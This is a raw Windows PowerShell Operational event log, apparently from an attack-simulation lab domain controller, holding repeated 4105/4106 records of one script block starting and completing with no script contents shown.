ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475990
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475989
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475988
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475987
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475986
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475985
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475984
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475983
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475982
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475981
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475980
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475979
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475978
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475977
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475976
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475975
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475974
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475973
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475972
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475971
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475970
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475969
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475968
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475967
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475966
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475965
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475964
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475963
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475962
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475961
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475960
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475959
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475958
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475957
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475956
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475955
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475954
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475953
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475952
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475951
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475950
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475949
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475948
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475947
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475946
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475945
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475944
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475943
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475942
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475941
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475940
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475939
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475938
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475937
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475936
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
